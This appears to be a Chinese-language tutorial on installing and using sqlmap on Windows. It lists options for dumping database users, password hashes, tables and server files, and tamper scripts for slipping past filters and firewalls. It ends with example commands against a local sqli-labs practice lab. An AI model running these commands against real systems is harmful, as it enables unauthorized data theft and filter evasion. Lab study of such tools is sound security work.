Windows下SQLMAP的下载安装和使用过程

-d 		指定直接数据库连接得连接字符串，直接连接到数据库。
-u 		指定URL目标
-I 		从Burp或WebScarab代理得日志中解析目标
-m 		扫描文本文件中给出得多个目标，批量扫描
-r 		从文本中加载HTTP请求。 用 * 标记注入位置
-g 		将Google Dork得结果作为目标URLh

-a 				获取所有信息
-current-user 	获取DBMS当前用户
--current-db  	获取DBMS当前数据库
--hostname 		获取DBMS当前主机名
--is-dba 		检测当前用户是否为管理员用户
--users 		查询DBMS用户
--passwords 	查询DBMS用户密码hash
--dbs 			查询DBMS数据库
--tables 		查询DBMS数据库中得表
--columns 		查询DBMS数据库表得列名
--dump 			查询转储DBMS数据库表
--dump-all 		转储DBMS所有数据库表
-D db_name 		指定要求枚举的DBMS数据库名
-T table_name 	指定要枚举得DBMS表
-C column_name 	指定要枚举得DBMS列
--batch 		从不询问用户输入，使用所有默认配置

--data=DATA 			通过POST方式发送数据字符串
--cookie=COOKIE 		HTTP Cookie头 LMXCMS演示
--user-agent=AGENT		指定HTTP User-Agent头
--random-agent 		    使用随机选定得HTTP User-Agent头
--host=HOST 			指定HTTP HOST header
--referer=REFERER 		指定HTTP Referer header
--ignore-proxy 			忽略系统默认代理配置
--proxy=PROXY 			使用代理连接目标URL --proxy=" http://127.0.0.1:8080"
--delay=DELAY 			可以设定两个请求间得延迟
--timeout=TIMEOUT 		可以设定一个请求超过多久判定为超时
--force-ssl 			强制使用SSL/HTTPS
--threads=THREADS 		HTTP（s）最大并发请求数（默认是1）
--dbms=DBMS 			强制指定后端DBMS
--os=OS 				强制指定后端得DBMS操作系统
--tamper 				使用给定得脚本修改注入数据

--level=LEVEL 	测试等级(1-5, default 1)
--risk=RISK 	测试的风险等级(1-3, default 1)
--technique 	来指定要使用哪种注入模式，快速扫描

--file-read=文件路径 	从后端的数据库管理系、统文件系统读取文件
--file-write=文件路径	编辑后端的数据库管理系统、文件系统上的本地文件
--file-dest=文件路径		后端的数据库管理系统、写入文件的绝对路径

--tamper=base64encode.py
--tamper=test.py
space2comment.py 				用/**/代替空格
apostrophemask.py 				用utf8代替引号
equaltolike.py 					like代替等号
space2dash.py                   绕过过滤‘=' 替换空格字符（”），（'–‘）后跟一个破折号注释，一个随机字符串和一个新行（'n'）
greatest.py 					绕过过滤'>' ,用GREATEST替换大于号。
space2hash.py 					空格替换为#号,随机字符串以及换行符
apostrophenullencode.py 	    绕过过滤双引号，替换字符和双引号。
halfversionedmorekeywords.py    当数据库为mysql时绕过防火墙，每个关键字之前添加mysql版本评论
space2morehash.py 				空格替换为 #号 以及更多随机字符串 换行符
appendnullbyte.py 				在有效负荷结束位置加载零字节字符编码
ifnull2ifisnull.py 				绕过对IFNULL过滤,替换类似'IFNULL(A,B)'为'IF(ISNULL(A), B, A)'
space2mssqlblank.py 			(mssql)空格替换为其它空符号
base64encode.py 				用base64编码替换
space2mssqlhash.py 				替换空格
modsecurityversioned.py 	    过滤空格，包含完整的查询版本注释
space2mysqlblank.py 			空格替换其它空白符号(mysql)
between.py						用between替换大于号（>）
space2mysqldash.py				替换空格字符（”）（' – ‘）后跟一个破折号注释一个新行（' n'）
multiplespaces.py				围绕SQL关键字添加多个空格
space2plus.py 					用+替换空格
bluecoat.py 					代替空格字符后与一个有效的随机空白字符的SQL语句,然后替换=为like
nonrecursivereplacement.py      双重查询语句,取代SQL关键字
space2randomblank.py			代替空格字符（“”）从一个随机的空白字符可选字符的有效集
sp_password.py					追加sp_password'从DBMS日志的自动模糊处理的有效载荷的末尾
chardoubleencode.py				双url编码(不处理以编码的)
unionalltounion.py				替换UNION ALLSELECT UNION SELECT
charencode.py 					url编码
randomcase.py					随机大小写
unmagicquotes.py				宽字符绕过 GPCaddslashes
randomcomments.py				用/**/分割sql关键字
charunicodeencode.py			字符串 unicode 编码
securesphere.py					追加特制的字符串
versionedmorekeywords.py	    注释绕过
space2comment.py				替换空格字符串(‘‘) 使用注释‘/**/'
halfversionedmorekeywords.py    关键字前加注释

python3 sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1"

python3 sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --is-dba

python3 sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-user

python3 sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --dbs

python3 sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-db

python3 sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D 数据库名 --tables

python3 sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D 数据库名 -T 表名 --columns

python3 sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D 数据库名 -T 表名 --dump